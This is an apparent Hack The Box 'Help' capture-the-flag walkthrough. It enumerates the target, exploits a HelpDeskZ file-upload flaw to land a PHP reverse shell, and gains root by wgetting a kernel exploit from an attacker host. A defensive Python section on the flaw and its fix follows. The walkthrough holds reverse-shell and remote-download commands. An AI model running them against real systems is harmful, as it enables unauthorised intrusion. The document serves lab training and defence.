HTB Help — Walkthrough
Enumeration
So let's start enumeration with an nmap scan:
root@ArmourInfosec:/ nmap -sV 10.10.10.121
Nmap scan report for 10.10.10.121 (10.10.10.121)
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's visit port 80 and see what's going on there.
Just the Apache default index page, nothing else.
Let's try gobuster with a small wordlist:
root@ArmourInfosec:/ gobuster -u http://10.10.10.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.121/
[+] Threads : 40
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/01 08:45:18 Starting gobuster
=====================================================
/support (Status: 301)
/javascript (Status: 301)
=====================================================
2019/05/01 08:45:50 Finished
=====================================================
When we visit http://10.10.10.121/support, there is the “HelpDeskZ :: Support Ticket System”
OK, so let's search for an existing exploit for it:
root@ArmourInfosec:/ searchsploit helpdeskz
Exploitation
Let's try to exploit it.
According to the exploit, when we attach a .php file (or one of the other blocked extensions) to a ticket, the application shows "File is not allowed", but the file is still uploaded and saved under http://10.10.10.121/support/uploads/tickets with an obfuscated (hashed) name, and the exploit recovers that link for us. So let's try it: I'm going to upload a PHP reverse shell as "1.php" (remember to change the IP and port in the shell file if you are also using a reverse shell). Visit
http://10.10.10.121/support/?v=submit_ticket&action=confirmation
then run the exploit:
root@ArmourInfosec:/ python 40300.py http://10.10.10.121/support/uploads/tickets/ 1.php
root@ArmourInfosec:/ nc -lvp 4444
$ cd /home/help
$ cat user.txt
Privilege Escalation
We got the user. For root, first let's get a TTY shell; for that I follow the guif.re Linux EoP guide, so a simple command:
$ python -c 'import pty;pty.spawn("/bin/bash")'
We got the TTY shell.
Now let's gather some information about the machine, like the kernel version.
So for that:
help@help:/$ uname -a
root@ArmourInfosec:/ searchsploit linux 4.4.0-116
Let's upload it to the victim machine; I will do it with a simple web server.
In the attacker machine:
root@ArmourInfosec:/ python -m SimpleHTTPServer 80
In the victim machine:
help@help:/$ cd /tmp
help@help:/$ wget http://<Attacker_IP>/44298.c
help@help:/$ gcc 44298.c
help@help:/$ ./a.out
help@help:/$ cd /root
help@help:/$ cat root.txt
And you got the root!!!!!!!!
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
What is the helpdeskz exploit doing?
The system saves the rejected file to the tickets directory anyway, under a special name: it takes the current time, converts it to a string, concatenates it with the filename, and computes the md5 hash of that, then saves the file under that hash. The script simply reverses this and gives us the exact link for which the response is "200 FOUND".
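To make the two mistakes concrete from the defender's side, here is an added Python illustration (not HelpDeskZ's code and not from the original walkthrough). The naming scheme, md5 of timestamp plus filename with the original extension kept, is assumed from the description above rather than taken from the real source. The vulnerable_save function writes the file before it decides to reject it and derives the stored name from values anyone can guess; hardened_save rejects first, uses a random name, and keeps the original extension out of the stored name. find_script_uploads is a simple check an administrator can run over an existing uploads directory to spot files that contain PHP code regardless of how they were named. All file contents and the timestamp are constructed samples.

```python
import hashlib
import os
import secrets
import tempfile
import time

# Constructed sample: extensions a help-desk upload form is meant to reject.
BLOCKED_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def predictable_upload_name(original_name: str, upload_time: int) -> str:
    """Assumed reconstruction of the naming scheme described in the walkthrough:
    md5(str(upload_time) + original_name), with the original extension kept.
    The only unknown is the upload second, so the name is easy to recover."""
    ext = os.path.splitext(original_name)[1]
    digest = hashlib.md5((str(upload_time) + original_name).encode()).hexdigest()
    return digest + ext


def vulnerable_save(original_name, data, upload_dir, upload_time=None):
    """Mirrors the flaw: the file is written to a web-served directory under a
    guessable name, and only afterwards is the 'not allowed' message produced."""
    if upload_time is None:
        upload_time = int(time.time())
    stored = predictable_upload_name(original_name, upload_time)
    with open(os.path.join(upload_dir, stored), "wb") as fh:
        fh.write(data)
    ext = os.path.splitext(original_name)[1].lstrip(".").lower()
    if ext in BLOCKED_EXTENSIONS:
        return {"message": "File is not allowed", "stored_as": stored}
    return {"message": "OK", "stored_as": stored}


def hardened_save(original_name, data, upload_dir):
    """Hardened form: decide before writing, store under a random name with no
    executable extension, and keep the original name only as metadata."""
    ext = os.path.splitext(original_name)[1].lstrip(".").lower()
    if ext in BLOCKED_EXTENSIONS:
        return {"message": "File is not allowed", "stored_as": None}
    stored = secrets.token_hex(16)  # 32 hex chars, unrelated to time or name
    with open(os.path.join(upload_dir, stored), "wb") as fh:
        fh.write(data)
    return {"message": "OK", "stored_as": stored, "original_name": original_name}


def find_script_uploads(upload_dir):
    """Defender check: list stored files whose first bytes look like PHP code,
    independent of the file name they were saved under."""
    hits = []
    for name in sorted(os.listdir(upload_dir)):
        with open(os.path.join(upload_dir, name), "rb") as fh:
            head = fh.read(64)
        if b"<?php" in head or b"<?=" in head:
            hits.append(name)
    return hits


def run_demo():
    """Constructed end-to-end run in a temporary directory."""
    upload_dir = tempfile.mkdtemp()
    payload = b"<?php echo 'constructed sample'; ?>"
    sample_time = 1556700318  # constructed upload timestamp
    weak = vulnerable_save("1.php", payload, upload_dir, upload_time=sample_time)
    strong = hardened_save("1.php", payload, upload_dir)
    benign = hardened_save("note.txt", b"hello", upload_dir)
    return {
        "weak": weak,
        "strong": strong,
        "benign": benign,
        "predicted": predictable_upload_name("1.php", sample_time),
        "detected": find_script_uploads(upload_dir),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Two points are worth noting about the hardened version. Rejecting before the write matters as much as the random name: a file that is never stored cannot be fetched, whatever it is called. Serving the uploads directory from the web root at all is the remaining risk; in practice the files should live outside the document root and be streamed back by the application with a non-executable content type.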